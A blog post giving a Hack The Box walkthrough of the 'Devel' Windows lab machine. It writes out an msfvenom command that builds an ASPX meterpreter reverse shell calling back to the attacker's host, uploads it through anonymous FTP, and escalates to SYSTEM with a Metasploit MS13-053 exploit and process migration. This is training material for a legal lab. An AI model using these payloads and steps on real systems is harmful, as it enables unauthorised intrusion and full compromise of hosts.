<!DOCTYPE html>


<html lang="en-us" data-theme="">
<head>
    
        
<meta charset="utf-8">
<meta name="HandheldFriendly" content="True">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="referrer" content="no-referrer-when-downgrade">

<title>Hackthebox: devel - ins3cure.com</title>
<meta name="description" content="You&#39;d better check your S3 buckets before someone else does">

<link rel="icon" type="image/x-icon" href="https://ins3cure.com/favicon.ico">
<link rel="apple-touch-icon-precomposed" href="https://ins3cure.com/favicon.png">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">


<script async src="https://www.googletagmanager.com/gtag/js?id=UA-168677970-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-168677970-1');
</script>




    





    
    
    

    
        <link rel="stylesheet" href="https://ins3cure.com/css/style.77f677c827f6d28cc36d9ebc5df12e45faaaf5475aa067dd6cc0c0485817a99c.css" integrity="sha256-d/Z3yCf20ozDbZ68XfEuRfqq9UdaoGfdbMDASFgXqZw=">
    





    





    
    
    

    
        <link rel="stylesheet" href="https://ins3cure.com/css/style.c6fed49e746b6647061b86d63e3ffc352542c1c94153560619db0da4f976fca2.css" integrity="sha256-xv7UnnRrZkcGG4bWPj/8NSVCwclBU1YGGdsNpPl2/KI=">
    





<meta property="og:title" content="Hackthebox: devel" />
<meta property="og:description" content="Walkthrough a new easy Windows box." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://ins3cure.com/posts/htb-devel/" /><meta property="og:image" content="https://ins3cure.com/images/og-featured.png"/><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2020-12-06T22:58:29+01:00" />
<meta property="article:modified_time" content="2020-12-06T22:58:29+01:00" />


<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://ins3cure.com/images/og-featured.png"/>

<meta name="twitter:title" content="Hackthebox: devel"/>
<meta name="twitter:description" content="Walkthrough a new easy Windows box."/>










<script async src="https://www.googletagmanager.com/gtag/js?id=G-18687JCG0Q"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-18687JCG0Q');
</script>



    
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.css" />

</head>
<body>
    <a class="skip-main" href="#main">Skip to main content</a>
    <div class="container">
        <header class="common-header"> 
            
                <h1 class="site-title">
    <a href="/"><span class="cursor">% </span>ins3cure.com</a><span class="logo_cursor"></span>
</h1>

    <nav>
        
        
        <a class="" href="https://ins3cure.com/categories/" title="Categories">Categories</a>
        
        <a class="" href="https://ins3cure.com/tags/" title="Tags">Tags</a>
        
    </nav>


            
        </header>
        <main id="main" tabindex="-1"> 
            
    
    
    <article class="post">
        <header class="post-header">
            <h1 class="post-title">Hackthebox: devel</h1>
    </header>
    

    


<div class="post-info">
    
    <div class="post-date">Posted Sunday, Dec 6, 2020</div>
    

    <div class="post-taxonomies">
        
            <ul class="post-tags">
                
                    <li><a href="https://ins3cure.com/tags/ctf">#ctf</a></li>
                
                    <li><a href="https://ins3cure.com/tags/hacking">#hacking</a></li>
                
                    <li><a href="https://ins3cure.com/tags/htb">#htb</a></li>
                
            </ul>
        
    </div>
</div>

        <div class="content">
            <p>Walkthrough a new easy Windows box.</p>
<p>Let&rsquo;s start with a scan:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">nmap -T4 -A -v 10.10.10.5
 
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed <span style="color:#f92672">(</span>FTP code 230<span style="color:#f92672">)</span>
| 03-18-17  02:06AM       &lt;DIR&gt;          aspnet_client
| 03-17-17  05:37PM                  <span style="color:#ae81ff">689</span> iisstart.htm
|_03-17-17  05:37PM               <span style="color:#ae81ff">184946</span> welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
</code></pre></div><p>Quick findings:</p>
<ul>
<li>IIS 7.5 has exploitable bugs</li>
<li>anonymous ftp will allow us to upload files</li>
</ul>
<p>Checking file upload&hellip;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
<span style="color:#ae81ff">220</span> Microsoft FTP Service
Name <span style="color:#f92672">(</span>10.10.10.5:kali<span style="color:#f92672">)</span>: anonymous
<span style="color:#ae81ff">331</span> Anonymous access allowed, send identity <span style="color:#f92672">(</span>e-mail name<span style="color:#f92672">)</span> as password.
Password:
<span style="color:#ae81ff">230</span> User logged in.
Remote system type is Windows_NT.
ftp&gt; put hello.htm
local: hello.htm remote: hello.htm
<span style="color:#ae81ff">200</span> PORT command successful.
<span style="color:#ae81ff">125</span> Data connection already open; Transfer starting.
<span style="color:#ae81ff">226</span> Transfer complete.
<span style="color:#ae81ff">57</span> bytes sent in 0.00 secs <span style="color:#f92672">(</span>1.6473 MB/s<span style="color:#f92672">)</span>
ftp&gt;
</code></pre></div><p>Hint: generate an ASP.NET payload with msfvenom</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST<span style="color:#f92672">=</span>10.10.14.15 LPORT<span style="color:#f92672">=</span><span style="color:#ae81ff">1234</span> -f aspx &gt; shell.aspx
<span style="color:#f92672">[</span>-<span style="color:#f92672">]</span> No platform was selected, choosing Msf::Module::Platform::Windows from the payload
<span style="color:#f92672">[</span>-<span style="color:#f92672">]</span> No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: <span style="color:#ae81ff">341</span> bytes
Final size of aspx file: <span style="color:#ae81ff">2800</span> bytes
</code></pre></div><p>Now:</p>
<ul>
<li>Upload our reverse shell to the IIS server</li>
<li>Start listening in our local host</li>
<li>Run remote shell.aspx by just visiting the site https://10.10.10.5/shell.aspx</li>
</ul>
<p>First step is trivial.</p>
<p>Second step:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">msf5 &gt; use exploit/multi/handler
msf5 exploit<span style="color:#f92672">(</span>multi/handler<span style="color:#f92672">)</span> &gt; set payload windows/meterpreter/reverse_tcp
msf5 exploit<span style="color:#f92672">(</span>multi/handler<span style="color:#f92672">)</span> &gt; set LHOST 10.10.14.15
LHOST <span style="color:#f92672">=</span>&gt; 10.10.14.15
msf5 exploit<span style="color:#f92672">(</span>multi/handler<span style="color:#f92672">)</span> &gt; set LPORT <span style="color:#ae81ff">1234</span>
LPORT <span style="color:#f92672">=</span>&gt; <span style="color:#ae81ff">1234</span>
msf5 exploit<span style="color:#f92672">(</span>multi/handler<span style="color:#f92672">)</span> &gt; run
</code></pre></div><p>Go to the web server and run our payload. We&rsquo;ll notice:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell"><span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Started reverse TCP handler on 10.10.14.15:1234
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Sending stage <span style="color:#f92672">(</span><span style="color:#ae81ff">176195</span> bytes<span style="color:#f92672">)</span> to 10.10.10.5
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Meterpreter session <span style="color:#ae81ff">1</span> opened <span style="color:#f92672">(</span>10.10.14.15:1234 -&gt; 10.10.10.5:49158<span style="color:#f92672">)</span> at 2020-06-22 13:24:15 -0400
 
meterpreter &gt; pwd
c:<span style="color:#ae81ff">\w</span>indows<span style="color:#ae81ff">\s</span>ystem32<span style="color:#ae81ff">\i</span>netsrv
 
meterpreter &gt; sysinfo
Computer        : DEVEL
OS              : Windows <span style="color:#ae81ff">7</span> <span style="color:#f92672">(</span>6.1 Build 7600<span style="color:#f92672">)</span>.
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : <span style="color:#ae81ff">0</span>
Meterpreter     : x86/windows
meterpreter &gt; shell
Process <span style="color:#ae81ff">1960</span> created.
Channel <span style="color:#ae81ff">1</span> created.
Microsoft Windows <span style="color:#f92672">[</span>Version 6.1.7600<span style="color:#f92672">]</span>
Copyright <span style="color:#f92672">(</span>c<span style="color:#f92672">)</span> <span style="color:#ae81ff">2009</span> Microsoft Corporation.  All rights reserved.
 
c:<span style="color:#ae81ff">\w</span>indows<span style="color:#ae81ff">\s</span>ystem32<span style="color:#ae81ff">\i</span>netsrv&gt;whoami
whoami
iis apppool<span style="color:#ae81ff">\w</span>eb
</code></pre></div><p>Ok, turns out the we are &ldquo;web&rdquo; and do not already have the required privileges.</p>
<p>We can try the usual easy way:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">meterpreter &gt; getsystem
<span style="color:#f92672">[</span>-<span style="color:#f92672">]</span> priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
<span style="color:#f92672">[</span>-<span style="color:#f92672">]</span> Named Pipe Impersonation <span style="color:#f92672">(</span>In Memory/Admin<span style="color:#f92672">)</span>
<span style="color:#f92672">[</span>-<span style="color:#f92672">]</span> Named Pipe Impersonation <span style="color:#f92672">(</span>Dropper/Admin<span style="color:#f92672">)</span>
<span style="color:#f92672">[</span>-<span style="color:#f92672">]</span> Token Duplication <span style="color:#f92672">(</span>In Memory/Admin<span style="color:#f92672">)</span>
</code></pre></div><p>Did not work 😄</p>
<p>Ok, let&rsquo;s use the suggester module. We need to let our meterpreter session to run in background:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">meterpreter &gt; background
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Backgrounding session 3...
msf5 exploit<span style="color:#f92672">(</span>multi/handler<span style="color:#f92672">)</span> &gt; search suggester
 
Matching Modules
<span style="color:#f92672">================</span>
 
   <span style="color:#75715e">#  Name                                      Disclosure Date  Rank    Check  Description</span>
   -  ----                                      ---------------  ----    -----  -----------
   <span style="color:#ae81ff">0</span>  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester
 
 
msf5 exploit<span style="color:#f92672">(</span>multi/handler<span style="color:#f92672">)</span> &gt; use post/multi/recon/local_exploit_suggester
msf5 post<span style="color:#f92672">(</span>multi/recon/local_exploit_suggester<span style="color:#f92672">)</span> &gt; show options
 
Module options <span style="color:#f92672">(</span>post/multi/recon/local_exploit_suggester<span style="color:#f92672">)</span>:
 
   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description <span style="color:#66d9ef">for</span> the available exploits
 
msf5 post<span style="color:#f92672">(</span>multi/recon/local_exploit_suggester<span style="color:#f92672">)</span> &gt; set session <span style="color:#ae81ff">3</span>
session <span style="color:#f92672">=</span>&gt; <span style="color:#ae81ff">3</span>
msf5 post<span style="color:#f92672">(</span>multi/recon/local_exploit_suggester<span style="color:#f92672">)</span> &gt; run
 
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> 10.10.10.5 - Collecting local exploits <span style="color:#66d9ef">for</span> x86/windows...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> 10.10.10.5 - <span style="color:#ae81ff">30</span> exploit checks are being tried...
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
...
</code></pre></div><p>So we can start trying all of them&hellip;</p>
<p>I was lucky with MS13-053:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">msf5 exploit<span style="color:#f92672">(</span>windows/local/ms10_092_schelevator<span style="color:#f92672">)</span> &gt; use exploit/windows/local/ms13_053_schlamperei

msf5 exploit<span style="color:#f92672">(</span>windows/local/ms13_053_schlamperei<span style="color:#f92672">)</span> &gt; show options

Module options <span style="color:#f92672">(</span>exploit/windows/local/ms13_053_schlamperei<span style="color:#f92672">)</span>:

Name Current Setting Required Description
 ---- --------------- -------- -----------
 SESSION yes The session to run this module on.

Exploit target:

Id Name
 -- ----
 <span style="color:#ae81ff">0</span> Windows <span style="color:#ae81ff">7</span> SP0/SP1


msf5 exploit<span style="color:#f92672">(</span>windows/local/ms13_053_schlamperei<span style="color:#f92672">)</span> &gt; set session <span style="color:#ae81ff">3</span>
session <span style="color:#f92672">=</span>&gt; <span style="color:#ae81ff">3</span>
msf5 exploit<span style="color:#f92672">(</span>windows/local/ms13_053_schlamperei<span style="color:#f92672">)</span> &gt; run

<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Started reverse TCP handler on 10.0.2.15:4444 
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Launching notepad to host the exploit...
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Process <span style="color:#ae81ff">2504</span> launched.
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Reflectively injecting the exploit DLL into 2504...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Injecting exploit into 2504...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Found winlogon.exe with PID <span style="color:#ae81ff">444</span>
<span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Everything seems to have worked, cross your fingers and wait <span style="color:#66d9ef">for</span> a SYSTEM shell
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Exploit completed, but no session was created.
</code></pre></div><p>Ok, <code>winlogon.exe</code> was found. A dll should have been injected and we can migrate to that process:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">msf5 exploit<span style="color:#f92672">(</span>windows/local/ms13_053_schlamperei<span style="color:#f92672">)</span> &gt; sessions <span style="color:#ae81ff">3</span>
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Starting interaction with 3...

meterpreter &gt; ps

Process List
<span style="color:#f92672">============</span>

PID PPID Name Arch Session User Path
 --- ---- ---- ---- ------- ---- ----
 <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">0</span> <span style="color:#f92672">[</span>System Process<span style="color:#f92672">]</span> 
 <span style="color:#ae81ff">4</span> <span style="color:#ae81ff">0</span> System 
 <span style="color:#ae81ff">264</span> <span style="color:#ae81ff">4</span> smss.exe 
 <span style="color:#ae81ff">344</span> <span style="color:#ae81ff">336</span> csrss.exe 
 <span style="color:#ae81ff">384</span> <span style="color:#ae81ff">336</span> wininit.exe 
 <span style="color:#ae81ff">396</span> <span style="color:#ae81ff">376</span> csrss.exe 
 <span style="color:#ae81ff">444</span> <span style="color:#ae81ff">376</span> winlogon.exe x86 <span style="color:#ae81ff">1</span> C:<span style="color:#ae81ff">\W</span>indows<span style="color:#ae81ff">\s</span>ystem32<span style="color:#ae81ff">\w</span>inlogon.exe
 <span style="color:#ae81ff">488</span> <span style="color:#ae81ff">384</span> services.exe 
 <span style="color:#ae81ff">500</span> <span style="color:#ae81ff">384</span> lsass.exe 
 <span style="color:#ae81ff">508</span> <span style="color:#ae81ff">384</span> lsm.exe 
 <span style="color:#ae81ff">608</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">672</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">724</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">800</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">808</span> <span style="color:#ae81ff">444</span> LogonUI.exe 
 <span style="color:#ae81ff">888</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">984</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">1064</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">1176</span> <span style="color:#ae81ff">488</span> spoolsv.exe 
 <span style="color:#ae81ff">1212</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">1300</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">1364</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">1416</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">1444</span> <span style="color:#ae81ff">488</span> msdtc.exe 
 <span style="color:#ae81ff">1504</span> <span style="color:#ae81ff">488</span> VGAuthService.exe 
 <span style="color:#ae81ff">1532</span> <span style="color:#ae81ff">488</span> vmtoolsd.exe 
 <span style="color:#ae81ff">1564</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">1892</span> <span style="color:#ae81ff">488</span> TrustedInstaller.exe 
 <span style="color:#ae81ff">2032</span> <span style="color:#ae81ff">608</span> WmiPrvSE.exe 
 <span style="color:#ae81ff">2796</span> <span style="color:#ae81ff">488</span> sppsvc.exe 
 <span style="color:#ae81ff">2836</span> <span style="color:#ae81ff">488</span> svchost.exe 
 <span style="color:#ae81ff">2936</span> <span style="color:#ae81ff">488</span> SearchIndexer.exe 
 <span style="color:#ae81ff">3860</span> <span style="color:#ae81ff">1564</span> w3wp.exe x86 <span style="color:#ae81ff">0</span> IIS APPPOOL<span style="color:#ae81ff">\W</span>eb c:<span style="color:#ae81ff">\w</span>indows<span style="color:#ae81ff">\s</span>ystem32<span style="color:#ae81ff">\i</span>netsrv<span style="color:#ae81ff">\w</span>3wp.exe

meterpreter &gt; migrate <span style="color:#ae81ff">444</span>
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Migrating from <span style="color:#ae81ff">3860</span> to 444...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Migration completed successfully.
meterpreter &gt; shell
Process <span style="color:#ae81ff">1860</span> created.
Channel <span style="color:#ae81ff">1</span> created.
Microsoft Windows <span style="color:#f92672">[</span>Version 6.1.7600<span style="color:#f92672">]</span>
Copyright <span style="color:#f92672">(</span>c<span style="color:#f92672">)</span> <span style="color:#ae81ff">2009</span> Microsoft Corporation. All rights reserved.

C:<span style="color:#ae81ff">\W</span>indows<span style="color:#ae81ff">\s</span>ystem32&gt;whoami
whoami
nt authority<span style="color:#ae81ff">\s</span>ystem

C:<span style="color:#ae81ff">\W</span>indows<span style="color:#ae81ff">\s</span>ystem32&gt;
</code></pre></div><p>We are <strong>SYSTEM</strong> now, so we just have to find the <code>user.txt</code> and <code>root.txt</code> files with the flags.</p>
        </div>
    </article>

    
        
    <div class="pagination post-pagination">
        <div class="left pagination-item ">
            
                <a href="/rhel8-root-password-recovery/">← RHEL8 root password recovery</a>
            
        </div>
        <div class="right pagination-item ">
            
                <a href="/htb/legacy/">Hackthebox: Legacy →</a>
            
        </div>
    </div>

    

    
        <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "ins3cure-com" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
    


        </main>
        
            <footer class="common-footer">
    
    

    <div class="common-footer-bottom">
        
        <div class="copyright">
            <p>Mandatory legal stuff:
            <a href="/legal">Legal notice</a> · 
            <a href="/privacy">Privacy policy</a> · 
            <a href="/cookies">Cookie policy</a><br>
            © ins3cure.com, 2022 · <a href="/about">About us</a><br>
            Powered by <a target="_blank" rel="noopener noreferrer" href="https://gohugo.io/">Hugo</a>, theme based on <a target="_blank" rel="noopener noreferrer" href="https://github.com/mitrichius/hugo-theme-anubis">Anubis</a>.
            </p>  
        </div> 

        

    



    <button class="theme-switcher">
        Dark theme
    </button>

    <script>
    const STORAGE_KEY = 'user-color-scheme'
    const defaultTheme = "auto"

    let currentTheme
    let switchButton
    let autoDefinedScheme = window.matchMedia('(prefers-color-scheme: dark)')

    const autoChangeScheme = e => {
        currentTheme = e.matches ? 'dark' : 'light'
        document.documentElement.setAttribute('data-theme', currentTheme)
        changeButtonText()
    }

    document.addEventListener('DOMContentLoaded', function() {
        switchButton = document.querySelector('.theme-switcher')
        currentTheme = detectCurrentScheme()
        if (currentTheme == 'dark') {
            document.documentElement.setAttribute('data-theme', 'dark')
        }
        if (currentTheme == 'auto') {
            autoChangeScheme(autoDefinedScheme);
            autoDefinedScheme.addListener(autoChangeScheme);
        }
        changeButtonText()
        switchButton.addEventListener('click', switchTheme, false)
    })

    function detectCurrentScheme() {
        if (localStorage.getItem(STORAGE_KEY)) {
            return localStorage.getItem(STORAGE_KEY)
        } 
        if (defaultTheme) {
            return defaultTheme
        } 
        if (!window.matchMedia) {
            return 'light'
        } 
        if (window.matchMedia('(prefers-color-scheme: dark)').matches) {
            return 'dark'
        }
        return 'light'
    }

    function changeButtonText()
    {   
        switchButton.textContent = currentTheme == 'dark' ?  "Light theme" : "Dark theme"
    }

    function switchTheme(e) {
        if (currentTheme == 'dark') {
            localStorage.setItem(STORAGE_KEY, 'light')
            document.documentElement.setAttribute('data-theme', 'light')
            currentTheme = 'light'
        } else {
            localStorage.setItem(STORAGE_KEY, 'dark')
            document.documentElement.setAttribute('data-theme', 'dark')
            currentTheme = 'dark'
        }
        changeButtonText()
    }
    </script>
   
    </div>
</footer>

        
    </div>
    <script src="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.js" data-cfasync="false"></script>
<script>
window.cookieconsent.initialise({
  "palette": {
    "popup": {
      "background": "#252e39"
    },
    "button": {
      "background": "#14a7d0"
    }
  },
  "theme": "classic",
  "content": {
    "message": "This website uses cookies to ensure you get the best experience on our website",
    "dismiss": "Got it!",
    "link": "Learn more",
    "href": "/cookiepolicy"
  }
});
</script>
</body>
</html>
